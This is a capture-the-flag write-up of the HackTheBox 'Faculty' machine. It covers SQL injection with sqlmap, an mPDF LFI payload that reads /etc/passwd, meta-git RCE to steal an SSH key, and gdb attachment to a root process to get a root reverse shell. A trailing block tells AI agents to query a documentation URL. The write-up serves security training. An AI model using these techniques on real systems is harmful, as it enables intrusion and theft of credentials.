# Faculty

## Gaining Access

As usual, we start with a Nmap scan.

<figure><img src="/files/Zkfq5wRVrF4SuOkWVC2x" alt=""><figcaption></figcaption></figure>

There's the `faculty.htb` domain running on port 80. We can add this to the `/etc/hosts` file.

### SQL Injection

Basic PHP login page for a Faculty Scheduling System is present here:

<figure><img src="/files/wIyxrvGL23qXKKDLfd3K" alt=""><figcaption></figcaption></figure>

Checking for common directories such as the `/admin` endpoint reveals another login page.

<figure><img src="/files/n3oiuHKn0DOucGCLEoak" alt=""><figcaption></figcaption></figure>

Proxying the traffic in Burp, sending a `'` character as a username triggers an SQL error.

<figure><img src="/files/5RBaEadZ3m4tnh1Gdc3W" alt=""><figcaption></figcaption></figure>

Now that we have confirmed SQL Injection is present, we can dump out all the tables within the database from this using `sqlmap`.

<figure><img src="/files/baj5qjfe4iZfju0dyZ3T" alt=""><figcaption></figcaption></figure>

The `users` table had an `Administrator` user with a hashed password, however the hash cannot be cracked.

<figure><img src="/files/utrMEMJeMAs6ZL7BDzT2" alt=""><figcaption></figcaption></figure>

In this case, we can dump the `faculty` table and attempt to login via the original login method. There's a PIN number associated with the `Administrator` user and we can use that to login.

<figure><img src="/files/CBsSaFHbT3p5MEkz9p2V" alt=""><figcaption></figcaption></figure>

### PDF Generator LFI

WItin the website, there's a PDF Generator that would display certain courses.

<figure><img src="/files/XYNPKxRTm6NVb7R2SxqE" alt=""><figcaption></figcaption></figure>

We can download this PDF and use `exiftool` to find out more information about it.

<figure><img src="/files/7Tsu6mHcOeo2Aq5jfYeM" alt=""><figcaption></figcaption></figure>

mPDF 6.0 is vulnerable to an LFI exploit that would allow for us to read the files on the server. With this, we can have to send this payload encoded with Base64:

{% code overflow="wrap" %}

```
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
```

{% endcode %}

This would load a PDF file that contains the `/etc/passwd` file.

<figure><img src="/files/Msy30cAN3AwnkP0rHOBL" alt=""><figcaption></figcaption></figure>

The `/etc/passwd` file would be attached to the main PDF like this:

<figure><img src="/files/So3qjg2pyXURRbHkkuQH" alt=""><figcaption></figcaption></figure>

We can then read it to find out the users that are present on the machine.

<figure><img src="/files/yyYspcEhlY8YVsU6ZybX" alt=""><figcaption></figcaption></figure>

From here, we can try to find the `admin.php` or `db.php` file within the machine to find some credentials. Doing a quick `gobuster` scan reveals that there is a `db_connect.php` file that we can read to find a password.

<figure><img src="/files/vZh9obSpmZPiKZgWd08y" alt=""><figcaption></figcaption></figure>

With this, we can `ssh` in as the `gbyolo` user using the password found.

## Privilege Escalation

### Meta-Git RCE

The other user found on the machine is the `developer` user. When checking the `sudo` privileges of the `gbyolo` user, we find this:

<figure><img src="/files/F37aqyZ2PMfrOU3tdD1u" alt=""><figcaption></figcaption></figure>

`meta-git` is a binary that allows us to clone repos as per git. However, this was vulnerable to an RCE exploit, meaning we can execute commands as `developer`.

{% embed url="<https://hackerone.com/reports/728040>" %}

Using the PoC, we can read the `id_rsa` file from the user's home directory.

<figure><img src="/files/tCJAZevWH5nMnQJ2Po5D" alt=""><figcaption></figcaption></figure>

Then, we can SSH in as `developer`.

### GDB Attaching

Doing initial enumeration reveals that the `developer` user is part of the `debug` group.

<figure><img src="/files/9TZwbVFUJ1pmjOCNivXZ" alt=""><figcaption></figcaption></figure>

Running LinPEAS also reveals that we can run GDB as we are part of the `debug` group.

<figure><img src="/files/Nn3dE71r5izsWRn8v3b8" alt=""><figcaption></figcaption></figure>

In this case, `gdb` can be used to attach ourselves to a process **run by root** and spawn more child processes. These child processes would all be running as root and we can basically gain RCE as root in this manner. This would stop the execution process and make the root thread spawn whatever other functions that we want.

First, we would need to find a process running as root, and preferably a Python or Bash one so we can execute commands easily.

<figure><img src="/files/rravkq5jxUTFRcz4FvRa" alt=""><figcaption></figcaption></figure>

The PID in this case is `621`, so we can run `gdb -p 621` to attach ourselves there. Afterwards, I called the `system()` function to spawn a reverse shell as root.

<figure><img src="/files/verFTFawgo6dmxpd0Ral" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1C8cM2tc9ZzLS0eXhQM4" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/medium/faculty.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.